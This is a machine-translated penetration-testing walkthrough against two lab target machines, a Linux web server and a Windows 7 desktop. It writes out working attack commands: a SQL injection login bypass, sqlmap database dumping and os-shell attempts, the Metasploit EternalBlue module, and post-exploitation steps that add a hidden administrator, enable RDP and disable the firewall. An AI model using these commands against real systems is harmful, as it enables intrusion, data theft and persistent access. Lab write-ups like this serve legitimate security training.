------------Restore content start------------
Two target aircrafts: from the host of a small enterprise
1. Server : Linux
2. Desktop : win
As shown in the figure:
One attacker: Kali Linux (self installed)
According to the README document, first put two target aircraft and one attacker on 192.168.8.0/24, and the network connection mode adopts NAT mode.
0x01 penetration process - Server
At this time, my virtual machine only has one kali and one server target. The following operations are performed in kali.
First, use nmap to scan 192.168.8.0/24 and identify the host operating system.
nmap -O 192.168.8.0/24
Result analysis: This is a Linux system. It can be preliminarily determined that this is a server server. Therefore, the server ip:192.168.8.2
nmap 192.168.8.2 -sV
Scan the port service and its version of the host, and the above results are obtained.
Since I am a chicken player who mainly focuses on the web, I first infiltrate port 80.
1, 80 port:
First, use the browser to browse 192.168.8.2.
Use passive scanning to open zap or burp, and manually browse all browsable pages.
Found in http://192.168.8.2/reports.php Under, there are suspicious sql injection points.
Enter in the password form: 'or 1=1#
Successfully logged in. Successfully verified the existence of sql injection vulnerability. In consideration of efficiency, sqlmap is used for vulnerability exploitation.
sqlmap -u http://192.168.8.2/reports.php --forms
It is found that there are two injection points (manual mining is supplemented. Not only the password parameter has injection points, but also the login parameter has injection points):
Find the current database and current user:
sqlmap -u http://192.168.8.2/reports.php --forms --current-db --current-user
Result: current user: company@localhost
Current database: company
Find all tables:
sqlmap -u http://192.168.8.2/reports.php --forms --tables
One step direct dump
sqlmap -u http://192.168.8.2/reports.php --forms -D company -T users --columns --dump
Directly query all the columns under the users table in the company database:
And the values in the table:
Enter the following command:
sqlmap -u http://192.168.8.2/reports.php --forms --os-shell
It is found that sql injection is not allowed to take shell.
Next, zap was used for active scanning, and an additional reflective xss vulnerability was found.
Similarly, xss vulnerability also exists at the sql injection point. As shown in the following figure, submit post parameters:
No, I can't find it. Port 80 is over.
2, 139, 445 ports:
I have checked all the loopholes that can be checked and tried everything that can be tried. My neck is sore. No progress, go to the Desktop.
0x02 penetration process - Desktop
First, use nmap to check the ip address of the desktop host, and use the following command:
nmap -O 192.168.8.0/24
You can confirm that the ip address of the desktop host is 192.168.8.60
Use the following command to view more detailed information:
nmap 192.168.8.60 -A -oN Desk_nmap_A.txt
Exported Desk_nmap_A.txt as follows:
# Nmap 7.80 scan initiated Thu Dec 17 00:46:37 2020 as: nmap -A -oN Desk_nmap_A.txt 192.168.8.60 Nmap scan report for 192.168.8.60 Host is up (0.00043s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP) MAC Address: 00:0C:29:10:02:00 (VMware) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose|specialized|phone Running: Microsoft Windows 2008|8.1|7|Phone|Vista OS CPE: cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_7::-:professional cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 OS details: Microsoft Windows Server 2008 R2 or Windows 8.1, Microsoft Windows 7 Professional or Windows 8, Microsoft Windows Embedded Standard 7, Microsoft Windows Phone 7.5 or 8.0, Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7, Microsoft Windows Vista SP2, Windows 7 SP1, or Windows Server 2008 Network Distance: 1 hop Service Info: Host: WIN-USPQ65TE72P; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_nbstat: NetBIOS name: WIN-USPQ65TE72P, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:10:02:00 (VMware) | smb-os-discovery: | OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1) | OS CPE: cpe:/o:microsoft:windows_7::sp1:professional | Computer name: WIN-USPQ65TE72P | NetBIOS computer name: WIN-USPQ65TE72P\x00 | Workgroup: WORKGROUP\x00 |_ System time: 2020-12-16T16:46:51+00:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-12-16T16:46:51 |_ start_date: 2020-12-16T16:35:05 TRACEROUTE HOP RTT ADDRESS 1 0.43 ms 192.168.8.60 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Thu Dec 17 00:47:30 2020 -- 1 IP address (1 host up) scanned in 53.10 seconds
It is found that port 445 is running Microsoft DS, execute the following command:
nmap --script=smb-vuln-*.nse --script-args=unsafe=1 192.168.8.60
CVE-2017-0143 vulnerability is most likely to exist.
Open msfconsole and use exploit/windows/smb/ms17_010_eternalblue vulnerability module, after set RHOST, exploit.
You can get the shell. As shown in the figure:
The next step is to find a way to raise power
1. add a new user:
net user kangel 2314838574 /add
2. add a new user to the administrator group
net localgroup administrators kangel /add
3. open 3389 port for remote connection
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
4. turn off the firewall (if it is not turned off, the next remote connection cannot be made)
NetSh Advfirewall set allprofiles state off
5. Open a new win7 virtual machine for remote connection.
------------End of recovery------------